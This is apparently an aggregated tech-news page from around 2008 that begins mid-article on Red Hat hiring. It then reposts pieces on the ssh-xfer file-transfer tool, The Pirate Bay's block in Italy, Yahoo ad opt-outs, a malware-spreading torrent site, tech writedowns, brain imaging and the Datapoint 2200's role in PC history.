"At Red Hat, our new hires must have the basic skills we require to perform the job, so while we don't offer 'on-the-job training,' we do offer opportunities to enhance core skills with additional training. For example, with our associate technical support engineer role, new hires participate in six weeks of in-house training and then sit for their Red Hat Certified Engineer certification, which is paid for by Red Hat," Alexander says.

Red Hat offers a summer intern program for undergraduates, graduates and MBAs. "We [Red Hat] have a three-month intern program, where interns work for specific departments and participate in cross-functional projects. The internship program delivers a robust exposure to open source," Alexander says.

Graduates trying to obtain an entry-level position with Red Hat need to be passionate about open source, and Red Hat's mission and values, according to Alexander. "Beyond that, as a growing company and a leader in the open source community, we look for entry-level employees who can demonstrate an ability to scale with Red Hat," she says. "With regard to specific technical skills, experience with Linux up-stream work, Java, C, C++, Perl and Python are big pluses."

If, after graduation, you are having trouble obtaining an entry-level position, Alexander says it is important for you to continually grow and adapt your skill set. "One approach for this is to seek additional education or certifications that are in high demand in the marketplace. For people focused on an open source career, an RHCE certification could be a good opportunity.

"In the Web 2.0 world, building a strong network is critical to managing your career. Utilizing tools such as Linkedin, Facebook, and Plaxo to build your professional network early in your college career is an important first step," Alexander says. "Also, try to seek out skill enhancement opportunities that are aligned to your career goals."

Google, Drupal and Red Hat are only a few of many organizations that offer open source opportunities to students. SourceForge.net hosts a "help wanted" board for non-commercial, open source project volunteer openings. AgoraCart survives on help from the community, and posts jobs, internships, and volunteer positions. The Apache Software Foundation also provides support for the Apache community of open source software projects. So take that first step -- do some research, get involved with the open source community, find a sponsor, and dive into a potentially lucrative and successful IT career.

Amber Gillies has worked in journalism for more than 10 years and holds a bachelor's degree in computer science.

Original here

ssh-xfer: Quickly grabbing files over an existing SSH connection

By Ben Martin

The Secure Shell (SSH) and Secure Copy (SCP) make remotely performing system administration and copying files across secure links a painless operation. SSH and SCP use the same SSH protocol to protect network communications, but they rely on users knowing beforehand whether they want a shell or to copy a file. You cannot easily use an existing SSH shell connection to a remote machine and just grab one or two files; if you want the files, you'll have to make another SSH connection for the file copy using SCP -- unless you have ssh-xfer.

The ssh-xfer project uses the local SSH agent to allow you to easily grab files using an existing SSH shell connection. You do not have to modify either the SSH client or server programs to use ssh-xfer -- but you will need to patch your ssh-agent. Although having to patch the ssh-agent is not ideal, you do gain one major advantage by doing this: you can send a file through more than one SSH connection. So if you first connect to the firewall, then from there to a remote server, and from that server to a remote desktop machine, and from the shell on the remote desktop machine you decide to grab /etc/foo.conf, you don't have to think about how you got there from your desktop, or how to SCP the file back via all the intermediate hosts. Simply run ssh-xfer /etc/foo.conf from the shell on the remote machine and the file will appear on your local machine's ~/Desktop -- or you can change the XFER_DEST_DIR definition in the ssh-xfer patch to specify a different default directory for transfers. Of course you'll need the ssh-xfer program to be available on the remote machine, but you don't need to change the SSH installation on any of the servers at all.
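
To illustrate that chained scenario (the host names here are only examples; each hop uses ssh -A to forward the agent, as explained below):

ben@desktop ~$ ssh -A firewall
ben@firewall ~$ ssh -A server
ben@server ~$ ssh -A remotedesktop
ben@remotedesktop ~$ ssh-xfer /etc/foo.conf
Sending file
. done.

The file lands in ~/Desktop on the local machine, no matter how many hops away the shell is.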

ssh-xfer is not packaged for Fedora, Ubuntu, or openSUSE. In this article I'll use a 64-bit Fedora 9 machine and build from source using ssh-xfer version 0.15 built against OpenSSH version 5.0p1-3.fc9 from the Fedora 9 updates repository.

The rpmbuild --recompile command below prepares and builds OpenSSH, including all the patches that Fedora adds to OpenSSH. Because we intend to patch the SSH agent, it is a good idea to recreate its source as the distribution uses it before applying the ssh-xfer patch. I found that a few parts of the patch did not apply cleanly to the current source, but these mainly related to slightly different return values (returning zero instead of nothing) and other things that are a fairly easy fix for a human but which prevent the patch from applying cleanly. I have uploaded an updated patch generated using OpenSSH version 5.0p1-3.fc9 from Fedora 9 updates to save others the time of performing these fixes.


$ rpmbuild --recompile /FromWeb/openssh-5.0p1-3.fc9.src.rpm
$ cd ~/rpmbuild/BUILD/openssh-5.0p1/
$ patch -p0 < /FromWeb/ssh-xfer-0.15.diff
...
patching file ssh-agent.c
...
Hunk #16 FAILED at 1417.
2 out of 16 hunks FAILED -- saving rejects to file ssh-agent.c.rej
... use my patch above or fix these issues by hand.

Once you have the sources patched, the commands below reconfigure the source tree and rebuild the ssh-agent and the new ssh-xfer program. Then you need to run the modified ssh-agent on your local desktop machine and have the ssh-xfer binary available on the remote machines that you might want to grab files from. If you are running the same distribution on the remote machines as the one on which you built ssh-agent and ssh-xfer, using SCP is probably the easiest way to get ssh-xfer onto the remote hosts.


$ ./config.status
$ make all ssh-xfer
$ su -l

# chown root:root ssh-xfer
# chmod 755 ssh-xfer
# scp -pv ssh-xfer myserver:/usr/local/bin
# install --mode 755 ssh-agent /usr/local/bin/ssh-agent-xfer

To use ssh-xfer you need to be running the modified SSH agent and have authentication agent connection forwarding enabled. There is a potential security issue with using agent forwarding, so it is not enabled by default. Basically, if there is a means to bypass file permissions on the machine you connect to with agent forwarding, then someone who can bypass the security on the remote machine can access your local SSH agent. This security issue makes sense if you consider that you are enabling a feature that forwards connections to the agent on the remote machine to the agent on your local machine.
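
If you decide the convenience is worth the risk, agent forwarding can be enabled per host rather than globally -- for example with an entry like this in ~/.ssh/config (myserver is the example host used below), or by passing -A on the command line as shown in the session that follows:

Host myserver
    ForwardAgent yes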

With the commands shown below, I first create a new local bash shell using the patched ssh-agent that has ssh-xfer support, then I SSH into a remote machine, create a new file there, and then ssh-xfer it back to my desktop machine.


ben@desktop ~$ ssh-agent-xfer bash
ben@desktop ~$ ssh -A ben@myserver
ben@myserver ~$ date > myserver-testfile.txt
ben@myserver ~$ ssh-xfer myserver-testfile.txt
Sending file
. done.
ben@myserver ~$ exit
ben@desktop ~$ cd ~/Desktop
ben@desktop Desktop$ ls -lh
-rw------- 1 ben ben 29 2008-07-21 21:11 myserver-testfile.txt
ben@desktop Desktop$ cat myserver-testfile.txt
Mon Jul 21 21:19:14 EST 2008

The use of SSH agent forwarding might make some avoid using ssh-xfer. The ssh-xfer homepage even describes it as hackish and states that the protocol used to transfer file bytes is not very sophisticated. Because ssh-xfer is agent-based, you can directly download a file through SSH connections that have been chained together (connect to host b, then from b to c to d). This keeps you from needing to remember exactly which connections you used to get to the host you are currently looking at in order to download a file.

In bygone days when one connected to a Unix machine using a dial-up connection and a terminal program, you could issue commands and initiate a download directly from the console. The idea of extending the SSH agent to allow for file transfers brings some of the power that was available in the old days to modern SSH connections by allowing file transfer to be initiated directly from a remote terminal.

Ben Martin has been working on filesystems for more than 10 years. He completed his Ph.D. and now offers consulting services focused on libferris, filesystems, and search solutions.

Original here

The Pirate Bay Blocked in Italy

The Pirate Bay has been “censored” in Italy following an urgent decree from a deputy public prosecutor. Pirate Bay’s IPs and the domain name are inaccessible, as they are blocked by ISPs all over the country. Whether these blocks will be very effective, however, is doubtful, since The Pirate Bay has already announced several countermeasures.

An insider working at an Internet provider in Italy told TorrentFreak that all the relevant large access ISPs in Italy have complied with the request to block the popular BitTorrent tracker, which was sent out yesterday.

Italy is taking a stand against BitTorrent sites, so it seems. Two weeks ago, the largest Italian torrent site, Columbo-BT, was shut down by the same prosecutor who is responsible for the Pirate Bay block. IFPI, the infamous anti-piracy organization, assisted the prosecutor, and it wouldn’t be a surprise if they assisted in this case as well, considering their history with The Pirate Bay.

In response to the news, Pirate Bay co-founder Peter Sunde told TorrentFreak that they have already implemented countermeasures to make sure all Italians will be able to access their site. “We’re working on setting up a really annoying system for them to filter,” he said. “Some of the ISPs decided to nullroute, so we changed IP and it works for them now. Some others decided to block the domain name, so we added labaia.org, which means ‘the bay’ in Italian.”

As usual, the popular BitTorrent tracker is not going down without a fight, and The Pirate Bay team is determined to keep the site accessible to all Italians. They will also contact the prosecutor, and they invite Italian lawyers who know how to counter the block legally to get in touch.

“We’re quite used to fascist countries not allowing freedom of speech. A lot of smaller nations that have dictators decide to block our site since we can help spread information that could be harmful to the dictators,” Sunde wrote in a blog entry.

This is not the first time that ISPs have been forced to block access to The Pirate Bay. In February, a Danish court ordered the ISP Tele2 to block its customers from accessing the site. The decision, which is currently under appeal, once again heated up the debate on Internet filtering by ISPs.

The Danish court case was initiated by the IFPI, which later tried to use the “landmark decision” to force Swedish ISPs to do the same, but failed. In fact, it seems that filtering traffic to The Pirate Bay is actually illegal under European law, and it is highly doubtful that the block in Italy is lawful.

Sunde has his suspicions about the reason for the block. “It’s quite funny that the country Italy is run by the biggest media mogul of them all. we’re his competitors,” he told us. Whether or not Berlusconi was personally involved, blocking The Pirate Bay is doomed to fail, and will only strengthen the popularity of the site in Italy.

Original here

Yahoo to let visitors decline more targeted ads

Yahoo Inc. will let its Web visitors decline ads targeted to their browsing habits, becoming the latest Internet company to break from a common industry practice as Congress steps up scrutiny of customized advertising and consumer privacy.

Yahoo has been offering that opt-out choice only for ads the company runs on outside, partner sites. Yahoo said Friday it would now extend that option to ads displayed on its own sites, to boost users' trust -- and, in doing so, perhaps draw visitors from its rivals.

The option will likely be available by the end of the month.

Yahoo spokeswoman Kelley Benander said the change has been in the works for some time, but the company decided to announce it early in response to an inquiry from the House Energy and Commerce Committee, whose subcommittee on the Internet held a hearing last month questioning online advertising practices.

Visitors who decline would still see ads, but not ones delivered through "behavioral targeting" -- in which a site displays ads for golf carts, for instance, to visitors who frequent golf sites, even when they are reading about Paris Hilton. Instead, they'd see a generic ad.

The policy change does not affect Yahoo's other targeted ads, such as those tied to search terms or location.

Nor does it stop the collection and retention of data that had been used to generate targeting profiles. Yahoo said it still needs the information for other reasons, including fraud detection and law-enforcement requests.

Yahoo said most consumers prefer targeted ads because they are more relevant. Furthermore, because people generally don't bother to change Web site settings, or don't know how to, the choice should have little effect on the company's ability to sell targeted ads, for which Yahoo can charge more because they reach the specific users most likely to buy something.

Although some privacy groups believe targeted ads should be permitted only when a user expressly consents, Pam Dixon of the World Privacy Forum praised Yahoo's expanded opt-out approach, which assumes permission unless a user takes steps to decline. Dixon said relatively few companies have offered even that choice on their own sites.

Time Warner Inc.'s AOL began extending the option to its own sites late last year, incorporating technology it acquired with the purchase of the behavioral-targeting firm Tacoda. Microsoft Corp. also allows opt out on its own sites.

Google Inc.'s privacy policy offers opt out to third-party sites only, though the company says it conducts little, if any, behavioral targeting. Instead, Google has focused on contextual targeting, in which ads are influenced by one's search terms or the text of a Web article.

Copyright 2008 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.

Original here

TrafficLoader.com to Infect BitTorrent Users with Malware

A new BitTorrent site has appeared which will allow scammers and spammers to infect its users with spyware, malware and viruses. An admin of TrafficLoader.com says that no bad torrents will ever be removed from the site and is inviting people to upload malicious software to infect torrent users.

Here at TorrentFreak we get a few emails each week announcing the arrival of new BitTorrent sites, but there are so many that we can’t possibly write about them all. Instead, due to time limitations, we write about the ones that are topical in some way or offer an interesting or unique feature. Today we report on a new torrent site which does indeed have an interesting feature, although most people won’t appreciate it.

One of the main drawbacks of using P2P software such as Limewire is that the content on the network (Gnutella) is unmoderated - anyone is free to put up whatever they like, be it music, movies or TV shows. Of course, others use this lack of moderation as a green light to upload viruses, spyware and other malicious software. Equally, one of the great strengths of BitTorrent (at least from a harm-reduction point of view) is that .torrent files are uploaded to torrent sites where staff work hard to filter out as much of the malicious software as they can, making BitTorrent relatively malware-free.

Of course, this great system falls apart if you can’t trust the people running the site. People expect anti-pirates like MiiVi to be ‘the enemy within’, but who needs those when you have ‘friends’ like the guys at new torrent site, TrafficLoader.com.

TrafficLoader.com (and its forum, pdls.info) hasn’t been set up for the benefit of BitTorrent users; it will be used by spammers, scammers and virus peddlers to spread their malicious software among the community (and make money off it). One of the admins, called ‘Satty’, says that no registration is needed to upload torrents to the site and that none will ever be removed. The site does carry a notice - ‘Viruses, spyware, affiliate links and everything related is strictly prohibited’ - but don’t believe it: Satty says these rules don’t apply to his friends in the PPI (Pay Per Install) community.

A few days ago the site was pretty bare, with relatively few torrents, and it was clear that most of them contained malware. It was suggested to Satty that it might be a good idea to have some genuine torrents too, to help disguise the bad ones. Now things are starting to ‘improve’ on the site, with many more torrents added recently which don’t immediately appear to be malware.

In the last few days, TrafficLoader cosmetically ‘cleaned up’ the site, removing porn adverts in order to appear more genuine, but unfortunately for them, someone besides TorrentFreak noticed that they had made a big mistake:

“Why would you [Satty, admin] put a forum for ppi on a publicly scraped site, a.k.a here?? Do you just want ppl to find out shit is full of malware?”

Just in case they did want people to find out, hopefully this post will help them get the word out.

For those that want advice on how to avoid bad torrents in the future, try one of our guides.

Update: The site was taken offline a few hours after this article was posted; that’s our good deed for the weekend.

Original here

No Takebacks: 5 Most Screwed-Up Tech Buys

Stacey Higginbotham


As the tech world gets itself in a tizzy over Google saying its 5 percent stake in AOL might be impaired — basically it may now be worth less than they thought it was — we thought we’d revisit some of the most notable tech writedowns in history. Under U.S. accounting rules, once something’s impaired, it can’t be marked up again, which typically leads to a write-off. The write-offs on our list aren’t necessarily the largest, but we think they exemplify a certain point in time in the fizzy world of technology valuations that’s worth remembering, but not worth repeating.

So far this year we’ve seen one of the largest corporate writedowns ever, that of Sprint-Nextel shaving $29.7 billion in value off its $35 billion merger with Nextel Communications. The writedown led to Sprint-Nextel posting a fourth-quarter loss of $29.9 billion, and the company is still dealing with the aftermath of its push-to-talk love affair. At the time of the merger, cell phone deals were the thing to do, but mismatched networks and customer bases doomed this one from the start.


Another relatively recent write-off occurred when eBay woke up next to Skype two years after it offered up to $4.1 billion for the peer-to-peer voice provider and realized it paid waaaay too much for the privilege. It wrote off $900 million, which is small potatoes compared to some of the other writedowns listed here, but worth mentioning as a case of new technology feeding off an old-school web giant’s desperation.

AOL’s purchase of Time Warner back in 2000 was spectacular both for its $106.2 billion price tag and its almost instant failure once the deal closed. By that point, the tech bubble had burst and in 2002 the combined company wrote down $54 billion thanks to the evaporation of AOL’s value. Even the easy money economy of the previous few years has yet to see a deal of such awesome valuation, something for which we can all be thankful.

The dot-com crash was followed by another wave of writedowns related to the companies that had banked on the Internet infrastructure rush, such as Qwest Communications, which spent $36.5 billion on U.S. West in 1999, only to turn around and write down $24 billion of that in 2002.

I’ll put Google’s possible impairment on here simply because it’s amazing that AOL has managed to convince two companies to overpay for it, even as it makes its own dubious buys. Since many financial experts are predicting a new wave of impairment charges, Google may be taking one of the first steps toward a round of tech-sector write-offs stemming from the Web 2.0 boom.

Original here

The Brain Unmasked

New imaging technologies reveal the intricate architecture of the brain, creating a blueprint of its connectivity.

By Emily Singer

Brain mapping: A variation on MRI called diffusion spectrum imaging allows scientists to map the neural fibers that relay signals in the brain. Each fiber in the image represents hundreds to thousands of fibers in the brain, each traveling along the same path.
Credit: George Day, Ruopeng Wang, Jeremy Schmahmann, Van Wedeen, MGH

The typical brain scan shows a muted gray rendering of the brain, easily distinguished by a series of convoluted folds. But according to Van Wedeen, a neuroscientist at Massachusetts General Hospital, in Boston, that image is just a shadow of the real brain. The actual structure--a precisely organized tangle of nerve cells and the long projections that connect them--has remained hidden until relatively recently.

Traditional magnetic resonance imaging, or MRI, can detect the major anatomical features of the brain and is often used to diagnose strokes and brain tumors. But advances in computing power and novel processing algorithms have allowed scientists to analyze the information captured during an MRI in completely new ways.

Diffusion spectrum imaging (DSI) is one of these twists. It uses magnetic resonance signals to track the movement of water molecules in the brain: water diffuses along the length of neural wires, called axons. Scientists can use these diffusion measurements to map the wires, creating a detailed blueprint of the brain's connectivity.

On the medical side, radiologists are beginning to use the technology to map the brain prior to surgery, for example, to avoid important fiber tracts when removing a brain tumor. Wedeen and others are now using diffusion imaging to better understand the structures that underlie our ability to see, to speak, and to remember. Scientists also hope that the techniques will grant new insight into diseases linked to abnormal wiring, such as schizophrenia and autism.

Original here

Forgotten PC history: The true origins of the personal computer

The PC's back story involves a little-known Texas connection

By Lamont Wood
This year marks an almost forgotten 40th anniversary: the conception of the device that ultimately became the PC. And no, it did not happen in California.

For decades, histories have traced the PC's x86 lineage back to 1972, with Intel Corp.'s introduction of the 8008 chip, the 8-bit follow-on to the 4-bit 4004, itself introduced in 1971 and remembered as the world's first microprocessor.

But the full story was not that simple. For one thing, the x86's lineage can be traced back four additional years, to 1968, and it was born at a now-defunct firm in San Antonio. The x86 was originally conceived by an all-but-forgotten engineer, Austin O. "Gus" Roche, who was obsessed with making a personal computer. For another thing, Intel got involved reluctantly, and the 8008 was not actually derived from the 4004 -- they were separate projects.

Industrial designer John "Jack" Frassanito, head of John Frassanito & Associates Inc., a NASA contractor in Houston, remembers wincing while plans for the device were drawn by Roche on perfectly good tablecloths in a private club in San Antonio in 1968. He was then a young account manager for legendary designer Raymond Loewy (who did the Coke bottle and the Studebaker Avanti, among other things). Frassanito was sent to Computer Terminal Corp. in San Antonio to help design CTC's first product, an electronic replacement for the Model 33 Teletype. CTC had recently been founded with local backing by former NASA engineers Phil Ray and Roche.

After arriving in San Antonio -- where he soon joined CTC's staff -- Frassanito said that he quickly discovered that the teletype-replacement project was merely a ruse to raise money for the founders' real goal of building a personal computer.

A hidden agenda

"When writing the business plan, they decided to stay away from the notion of a personal computer, since the bankers they were talking to had no idea what a computer was or wasn't," Frassanito recalled. "So for the first product, they needed something they could get off the ground with existing technology. But the notion from the get-go was to build a personal computer firm."

The resulting terminal, the Datapoint 3300, established CTC as a going concern, and planning began on the project that Frassanito realized was Roche's obsession. He remembers lengthy discussions with Roche about what a personal computer should do and look like. Roche often expressed himself using metaphors from various classics, such as Machiavelli's The Prince, which Frassanito found necessary to read.

To ensure a market for the machine, Frassanito said that the CTC founders decided to promote it (with appropriate programming) as a replacement for the IBM 029 card punch machine, and they gave it a half-height display to match the aspect of an IBM punch card. To keep it from being intimidating in an office, they gave it the same footprint as an IBM Selectric typewriter.

The resulting compact enclosure had heat problems, and in late 1969 and early 1970, the designers began looking for ways to reduce the number of components, including reducing the CPU board to one chip.

The start of Intel's involvement

Frassanito recalled accompanying Roche to a meeting with Bob Noyce, head of Intel, in early 1970 to try to get Intel -- then a start-up devoted to making memory chips -- to produce the CPU chip. Roche presented the proposed chip as a potentially revolutionary development and suggested that Intel develop the chip at its own expense and then sell it to all comers, including CTC, Frassanito recalled.

"Noyce said it was an intriguing idea, and that Intel could do it, but it would be a dumb move," said Frassanito. "He said that if you have a computer chip, you can only sell one chip per computer, while with memory, you can sell hundreds of chips per computer." Nevertheless, Noyce agreed to a $50,000 development contract, Frassanito recalled.

Frassanito's recollection of Noyce's negative reaction is echoed in the transcript of a group interview done in September 2006 at the Computer History Museum in Mountain View, Calif. The group included six people who were involved in the development or marketing of Intel's first CPU chips: Federico Faggin, Hal Feeney, Ed Gelbach, Ted Hoff, Stan Mazor and Hank Smith. They agreed that Intel's management at the time feared that if Intel put a CPU chip in its catalog, the computer vendors that were Intel's customers for memory chips would see Intel as a competitor and go elsewhere for memories.

That fear, they indicated, was evident as late as 1973. The group also recalled that work was suspended on the CTC chip, called the 1201, in the summer of 1970 after CTC lost interest, having decided to go ahead with a CPU board using transistor-transistor-logic (TTL) circuits instead of relying on a chip-based design. TTL is the level of integration that preceded microcircuits, where a chip might have tens of transistors rather than thousands.

Hoff, then an Intel engineer, wasn't surprised. The CTC processor architecture "could go to 16,000 bytes of memory, and if you were going to spend that much on memory, then there was no sense in saving maybe $50 on the processor by moving it out of TTL," Hoff told Computerworld. Memory fell to a penny a bit in 1972, he recalled, so 16KB would have then cost $1,280 (around $6,700 today).

The 2200 debuts

CTC's TTL-based desktop personal computer, called the Datapoint 2200, was unveiled in 1970, with cassette tapes for 130KB of mass storage and 8K of internal memory. The first end-user sale (for 40 units) was to General Mills on May 25, 1970.

Following IBM's marketing model, the machines were leased: $168 monthly for a machine with 8K of memory, and $148 for 2K, with modems adding $30 monthly. RAM was not then available, so for internal memory the unit used recirculating MOS memory, with an access time of up to 500 microseconds for the first byte and 8 microseconds per sequential byte thereafter.

Aaron Goldberg, who in the 1970s was a researcher at IDC and is now vice president at Ziff Davis Media Market Experts in New York, remembered the Datapoint 2200 as one of the first single-user minicomputers, in the same class as the IBM 5320. "These were industrial-strength products. They were trying to downsize [mainframe] business applications," he recalled.

The logic unit appeared to be 8 bits wide, but the processor actually had to loop eight times to process a byte, noted Jonathan Schmidt, then with CTC and now vice president at Perftech Inc. in San Antonio.

Datapoint 2200
Production version of the Datapoint 2200.

At Intel, with the CTC chip on hiatus, development proceeded on the 4004, a 4-bit processor chip for Busicom, a now-defunct Japanese calculator firm that contracted with Intel before CTC, although work on the two projects began at about the same time. But after six months, Seiko Holdings Corp., another Japanese firm, expressed interest in using CTC's 1201 chip for a scientific calculator, and Intel resumed development on the CTC chip. The delay let the 1201 designers upgrade from a 16-pin to an 18-pin package.

CTC had also given a second-source contract to Texas Instruments Inc. Delivered in late 1970 or early 1971, the TI version of the 1201 chip never worked well, and the project was abandoned, Frassanito recalled. The Computer History Museum interviewees said that it was inadvertently sabotaged when TI used an initial specification -- produced for CTC by Intel -- that proved to be flawed.

Datapoint 2200 blueprint
Blueprint of the Datapoint 2200 enclosure, showing the crowded interior.

Intel's 1201 chip was delivered to CTC in late 1971, but by then CTC was developing the Datapoint 2200 II, which ran much faster and supported a hard drive, and CTC's management was not interested in a chip that it now considered obsolete. Outvoting Roche, who Frassanito said was white-faced with shock at the decision, they dropped the project and abandoned the 1201 chip's intellectual property to Intel.

Giving all 1201 rights to Intel

"Roche said the idea that you can print a computer on a chip is astounding, a profound innovation, and we should own the intellectual property," Frassanito recalled. "They said, why spend $50,000 for a product we can't use? It was one of the worst business decisions in history."

The 4004 was put in the Intel catalog in November 1971, becoming history's first commercial microprocessor. The 1201, renamed the 8008, was offered in April 1972, for $120. Unlike the 4004, the 8008 could use standard RAM (which had become available) and ROM memory, making it popular with embedded applications, the interviewees recalled. Since no one was using the chip initially to compete against the mainstream computer vendors, there was no backlash from them, and the nervousness of Intel's management eventually eased.

Also in 1972, design Patent 224,415 was issued to Roche, Ray, and Frassanito for the appearance of the Datapoint 2200, allowing them to say they held the patent for the first PC. (Other parties claimed utility patents for the microprocessor, and the precedence of these other patents was in litigation for decades.)

In 1974, Intel brought out the 8080 chip based on the same architecture as the 8008, using suggestions from CTC engineers derived from developing the Datapoint 2200 II. Its use of a recently developed 40-pin package meant that fewer support chips were required to multiplex the output. Its descendants formed the x86 dynasty, especially after the 8088 was used in the first IBM PC in 1981.

Therefore, any PC in use today can trace its ancestry to the Datapoint 2200.

"I can look at a current PC and still see the image of that original machine buried down in there, with a lot of other stuff, especially more registers," said Victor D. Poor, then a CTC executive, now retired in Melbourne, Fla.

Patent screen
Opening screen at the Web site of the U.S. Patent and Trademark Office for design Patent 224,415, assigned to CTC's Ray, Roche and Frassanito.

Intel went on to make billions of dollars off its x86 line. As for CTC, it changed its name to Datapoint at the end of 1972, and some of the same engineers involved in the Datapoint 2200 project were involved in developing the first commercial local-area network -- ARCnet -- which came out in 1977. But in the 1980s Datapoint went into decline, thrown into turmoil by an accounting scandal. Later, like many minicomputer firms, it proved unable to compete with cheaper PCs -- Datapoint's progeny, ironically. Datapoint's remnants were liquidated in 2000.

Roche died in a car accident in 1975, Ray died in 1987, and Noyce died in 1990. Frassanito left Datapoint to set up his own firm in 1975 and worked on the space shuttle and space station projects, among other things.

As far as Frassanito knew, the Datapoint 2200 was never actually used as an IBM 029 card punch replacement.

Wood is a freelance writer in San Antonio.

Original here